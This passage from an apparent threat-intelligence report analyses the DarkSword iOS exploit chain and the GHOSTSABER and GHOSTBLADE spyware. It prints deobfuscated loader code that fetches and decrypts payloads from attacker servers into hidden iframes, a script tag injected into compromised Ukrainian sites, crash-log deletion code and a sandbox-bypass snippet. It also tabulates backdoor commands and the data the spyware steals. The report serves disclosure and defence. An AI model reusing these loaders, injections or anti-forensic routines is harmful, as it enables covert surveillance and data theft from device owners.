deriveAesKey(_0x35744f.privateKey, _0x2f4536); const _0x36e338 = decryptData(_0xfae3b8, _0xa36b4f); const _0x50186a = new TextDecoder().decode(_0x36e338); return _0x50186a; } return null; }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 11: Deobfuscated </span><code style="vertical-align: baseline;">getJS()</code><span style="vertical-align: baseline;"> snippet from the DarkSword loader (PARS Defense, November 2025)</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>let workerCode = ''; if (ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2' || ios_version == '18,7') { workerCode = getJS('6cde159c.js?' + Date.now()); } else { workerCode = getJS('a9bc5c66.js?' + Date.now()); } let workerBlob = new Blob([workerCode], { 'type': 'text/javascript' }); let workerBlobUrl = URL.createObjectURL(workerBlob);</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 12: Deobfuscated snippet for loading the RCE workers (PARS Defense, November 2025)</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>if (!sessionStorage.getItem('uid') &amp;&amp; canUseApplePay() &amp;&amp; "standalone" in navigator &amp;&amp; (CSS.supports("backdrop-filter: blur(10px)") || CSS.supports("-webkit-backdrop-filter: blur(10px)")) &amp;&amp; document.pictureInPictureEnabled &amp;&amp; !(typeof window.chrome === "object" &amp;&amp; window.chrome !== null) &amp;&amp; !('InstallTrigger' in window) &amp;&amp; supportsWebGL2() &amp;&amp; getDeviceInputInfo() &amp;&amp; !("vibrate" in navigator) &amp;&amp; debuggerCheck()) { (() =&gt; { function _0x45e723(_0x52731a) { const _0x43f8d9 = generateKeyPair(); const _0x427066 = exportPublicKeyAsPem(_0x43f8d9.publicKey); const _0x5cfee7 = self.btoa(_0x427066); const _0x96910f = { 'a': _0x5cfee7 }; _0x52731a = _0x52731a.startsWith('/') ? _0x52731a : '/' + _0x52731a; const _0x436cc4 = new XMLHttpRequest(); _0x436cc4.open("POST", 'https://&lt;redacted&gt;' + (_0x52731a + '?' + Date.now()), false); _0x436cc4.setRequestHeader('Content-Type', "application/json"); _0x436cc4.send(JSON.stringify(_0x96910f)); if (_0x436cc4.status === 0xc8) { const _0x4a4193 = JSON.parse(_0x436cc4.responseText); const _0x362b30 = _0x4a4193.a; const _0x536004 = _0x4a4193.b; const _0x183b3f = b64toUint8Array(_0x362b30); const _0x46bbee = b64toUint8Array(_0x536004); const _0x43e600 = deriveAesKey(_0x43f8d9.privateKey, _0x46bbee); const _0x2e0735 = decryptData(_0x183b3f, _0x43e600); const _0x26a8b1 = new TextDecoder().decode(_0x2e0735); return _0x26a8b1; } return null; } let _0x100ce6 = _0x45e723('6297d177.html?' + Math.random()); const _0x5f5a7d = document.createElement("iframe"); _0x5f5a7d.srcdoc = _0x100ce6; _0x5f5a7d.style.height = 0x0; _0x5f5a7d.style.width = 0x0; _0x5f5a7d.style.border = 'none'; document.body.appendChild(_0x5f5a7d); })(); } else { top.location.href = "&lt;legit website&gt;"; window.location.href = '&lt;legit website&gt;'; }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 13: Deobfuscated landing page snippet to fetch the DarkSword loader (PARS Defense, January 2026)</span></span></p></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">GHOSTSABER</span></h5> <p><span style="vertical-align: baseline;">GHOSTSABER is a JavaScript backdoor used by PARS Defense that communicates with its C2 server over HTTP(S). Its capabilities include device and account enumeration, file listing, data exfiltration, and the execution of arbitrary JavaScript code; a complete list of its supported commands is detailed in Table 1. Observed GHOSTSABER samples contain references to several commands that lack the necessary code to be executed, including some that purport to record audio from the device's microphone and send the device's current geolocation to the C2 server. These commands use a function called </span><code style="vertical-align: baseline;">send_command_to_upper_process</code><span style="vertical-align: baseline;">, which writes to a shared memory region that is otherwise unused in the implant. We suspect that a follow-on binary module may be downloaded from the C2 server to implement these commands at runtime.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Command</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ChangeStatusCheckSleepInterval</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Changes the sleep duration between C2 check-ins</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">SendDeviceInfo</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Uploads basic device information to the C2 server</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">SendUserAccountsList</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Uploads a list of the signed-in accounts on the device to the C2 server</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">SendAppList</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Uploads a list of the installed applications to the C2 server</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">SendCurrentLocation</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Not directly implemented</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">ExecuteSqliteQuery</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Executes an arbitrary SQL query against an arbitrary SQLite database and uploads the results to the C2 server</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">UnwrapKey</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No-op</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">SendScreenshot</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Not directly implemented</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">SendWiFiInfo</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Not directly implemented</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">SendThumbnails</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Uploads thumbnails from iOS' Photos app within a specified time period to the C2 server</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">SendApp</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Uploads all of the files for a specified installed application to the C2 server</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">RecordAudio</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Not directly implemented</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">SendFiles</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Uploads a list of arbitrary files to the C2 server</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">SendRegEx</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Uploads a list of files with paths matching a specified regex pattern to the C2 server</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">SendFileList</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Uploads a recursive list of files and metadata in a specified directory to the C2 server</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">EvalJs</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Executes an arbitrary JavaScript blob and uploads the output to the C2 server</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Table 1: Commands supported by GHOSTSABER</span></span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">New Ukrainian Watering Hole Activity From UNC6353</span></h4> <p><span style="vertical-align: baseline;">GTIG observed the suspected Russian espionage actor UNC6353 leveraging DarkSword in a new watering hole campaign targeting Ukrainian users. As mentioned in our recent </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit"><span style="text-decoration: underline; vertical-align: baseline;">blog post</span></a><span style="vertical-align: baseline;">, we first began tracking UNC6353 in summer 2025 as a threat cluster conducting watering hole attacks on Ukrainian websites to deliver Coruna. This new activity, which has been active through March 2026 but dates back to at least December 2025, leverages the DarkSword exploit chain to deploy GHOSTBLADE. GTIG notified and collaborated with CERT-UA to mitigate this activity.</span></p> <p><span style="vertical-align: baseline;">Compromised Ukrainian websites were updated to include a malicious </span><code style="vertical-align: baseline;">script</code><span style="vertical-align: baseline;"> tag that fetched the first delivery stage from an UNC6353 server, </span><code style="vertical-align: baseline;">static.cdncounter[.]net</code><span style="vertical-align: baseline;"> (Figure 14). This script (Figure 15) dynamically creates a new IFrame and sets its source to a file called </span><code style="vertical-align: baseline;">index.html</code><span style="vertical-align: baseline;"> on the same server (Figure 16). While </span><code style="vertical-align: baseline;">index.html</code><span style="vertical-align: baseline;"> bears some overlap with the landing page logic used by UNC6748 and PARS Defense, it sets the </span><code style="vertical-align: baseline;">uid</code><span style="vertical-align: baseline;"> session storage key without checking the session's current state, and includes a Russian language comment that translates to "if uid is still needed, just install it."</span></p> <p><span style="vertical-align: baseline;">Notably, the observed UNC6353 use of DarkSword only supported iOS 18.4-18.6. While earlier DarkSword use attributed to UNC6748 and PARS Defense also supported iOS 18.7, we did not observe that from UNC6353, despite their later operational timeline. However, the loader used in this version correctly loaded the RCE modules corresponding to the running iOS version, which we didn't observe in UNC6748's use of DarkSword with only iOS 18.4-18.6 support (Figure 17).</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;script async src="https://static.cdncounter.net/widgets.js?uhfiu27fajf2948fjfefaa42"&gt;&lt;/script&gt;</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 14: Malicious </span><code style="vertical-align: baseline;">script</code><span style="vertical-align: baseline;"> tag used by UNC6353 (March 2026)</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>(function () { const iframe = document.createElement("iframe"); iframe.src = "https://static.cdncounter.net/assets/index.html"; iframe.style.width = "1px"; iframe.style.height = "1px"; iframe.style.border = "0"; iframe.style.position = "absolute"; iframe.style.left = "-9999px"; iframe.style.opacity = "0.01"; // важно для Safari iframe.setAttribute( "sandbox", "allow-scripts allow-same-origin" ); document.body.appendChild(iframe); })();</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 15: </span><code style="vertical-align: baseline;">widgets.js</code><span style="vertical-align: baseline;"> (UNC6353, March 2026)</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;!DOCTYPE html&gt; &lt;html lang="en"&gt; &lt;head&gt; &lt;meta charset="UTF-8"&gt; &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt; &lt;title&gt;Test Page&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;script&gt; // если uid всё ещё нужен — просто устанавливаем sessionStorage.setItem('uid', '1'); const frame = document.createElement('iframe'); frame.src = 'frame.html?' + Math.random(); frame.style.width = '1px'; frame.style.opacity = '0.01' frame.style.position = 'absolute'; frame.style.left = '-9999px'; frame.style.height = '1px'; frame.style.border = 'none'; document.body.appendChild(frame); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt;</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 16: </span><code style="vertical-align: baseline;">index.html</code><span style="vertical-align: baseline;"> (UNC6353, March 2026)</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>let workerCode = ""; if(ios_version == '18,6' || ios_version == '18,6,1' || ios_version == '18,6,2') workerCode = getJS(`rce_worker_18.6.js?${Date.now()}`); // local version else workerCode = getJS(`rce_worker_18.4.js?${Date.now()}`); // local version let workerBlob = new Blob([workerCode],{type:'text/javascript'}); let workerBlobUrl = URL.createObjectURL(workerBlob);</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 17: </span><code style="vertical-align: baseline;">rce_loader.js</code><span style="vertical-align: baseline;"> snippet for loading the RCE exploit workers (UNC6353, March 2026)</span></span></p></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">GHOSTBLADE</span></h5> <p><span style="vertical-align: baseline;">Following device infections from these watering holes, UNC6353 deployed a malware family GTIG tracks as GHOSTBLADE. GHOSTBLADE is a dataminer written in JavaScript that collects and exfiltrates a wide variety of data from a compromised device (Table 2). Data collected by GHOSTBLADE is exfiltrated to an attacker-controlled server over HTTP(S). Unlike GHOSTKNIFE and GHOSTSABER, GHOSTBLADE is less capable and does not support any additional modules or backdoor-like functionality; it also does not operate continuously. However, similar to GHOSTKNIFE, GHOSTBLADE also contains code to delete crash reports, but targets a different directory where they may be stored (Figure 18). The GHOSTBLADE sample observed in this activity had full debug logging present along with lots of comments in the code.</span></p> <p><span style="vertical-align: baseline;">Notably, the GHOSTBLADE sample analyzed by GTIG contains a comment and code block conditionally executing code on iOS versions greater than or equal to 18.4, which is the minimum supported version by DarkSword (Figure 19; note that </span><code style="vertical-align: baseline;">ver</code><span style="vertical-align: baseline;"> is parsed from </span><code style="vertical-align: baseline;">uname</code><span style="vertical-align: baseline;">, which returns the XNU version). This suggests the payload also supports running on versions lower than 18.4, which isn't supported by DarkSword.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <thead> <tr> <th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: left;"><strong style="vertical-align: baseline;">Category</strong></p> </th> <th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: left;"><strong style="vertical-align: baseline;">Collected Data</strong></p> </th> </tr> </thead> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Communication and Messaging</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">iMessage database, Telegram data, WhatsApp data, mail indexes, call logs, contacts interaction data, contacts</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Identity and Access</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Device/account identifiers, signed in accounts, device keychains, SIM card info, device profiles</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Location and Mobility</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Location history, saved/known WiFi networks and passwords, Find My iPhone settings, location services settings</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Personal Content and Media</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Photos metadata, hidden photos, screenshots, iCloud Drive files, Notes database, Calendar database</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Financials and Transactions</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cryptocurrency wallet data</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Usage and Behavioral Data</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Safari history/bookmarks/cookies, Health database, device personalization data</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">System and Connectivity</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">List of installed applications, Backup settings/info, cellular usage/data info, App Store preferences</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Table 2: Data collected by GHOSTBLADE</span></span></div></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>static deleteCrashReports() { this.getTokenForPath("/private/var/containers/Shared/SystemGroup/systemgroup.com.apple.osanalytics/DiagnosticReports/",true); libs_JSUtils_FileUtils__WEBPACK_IMPORTED_MODULE_0__["default"].deleteDir("/private/var/containers/Shared/SystemGroup/systemgroup.com.apple.osanalytics/DiagnosticReports/",true); }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 18: GHOSTBLADE code snippet used for deleting crash logs</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>// If iOS &gt;= 18.4 we apply migbypass in order to bypass autobox restrictions if (ver.major == 24 &amp;&amp; ver.minor &gt;= 4) { mutexPtr = BigInt(libs_Chain_Native__WEBPACK_IMPORTED_MODULE_0__["default"].callSymbol("malloc", 0x100)); libs_Chain_Native__WEBPACK_IMPORTED_MODULE_0__["default"].callSymbol("pthread_mutex_init", mutexPtr, null); migFilterBypass = new MigFilterBypass(mutexPtr); }</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 19: Code conditionally executed on iOS 18.4+ in GHOSTBLADE</span></span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">DarkSword Exploit Chain</span></h3> <p><span style="vertical-align: baseline;">As mentioned, DarkSword uses six different vulnerabilities to fully compromise a vulnerable iOS device and run a final payload with full kernel privileges (Table 3). Unlike Coruna, DarkSword only supports a limited set of iOS versions (18.4-18.7), and while the different exploit stages are technically sophisticated, the mechanisms used for loading the exploits were more basic and less robust than Coruna.</span></p> <p><span style="vertical-align: baseline;">Also unlike Coruna, DarkSword uses pure JavaScript for all stages of the exploit chain and final payloads. While more sophistication is required to bridge between JavaScript and the native APIs and IPC channels used in the exploit, its use eliminates the need to identify vulnerabilities for bypassing </span><a href="https://support.apple.com/guide/security/operating-system-integrity-sec8b776536b/1/web/1#sec314c3af61" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Page Protection Layer (PPL)</span></a> or<span style="vertical-align: baseline;"> <a href="https://support.apple.com/guide/security/operating-system-integrity-sec8b776536b/1/web/1#secd022396fb" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Secure Page Table Monitor (SPTM)</span></a> exploit mitigations in iOS that prevent unsigned binary code from being executed.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col style="width: 22.5972%;"/><col style="width: 22.9881%;"/><col style="width: 21.8144%;"/><col style="width: 15.805%;"/><col style="width: 16.8499%;"/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Exploit Module</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">CVE</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Exploited as a Zero-Day</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Patched in iOS Version(s)</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">rce_module.js</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2025-31277</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Memory corruption vulnerability in JavaScriptCore</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">No</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">18.6</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">rce_worker_18.4.js</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CVE-2026-20700</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">User-mode Pointer Authentication Code (PAC) bypass in </span><code style="vertical-align: baseline;">dyld</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Yes</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">26.3</span></p> </td> </tr> <tr> <td rowspan="2" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span 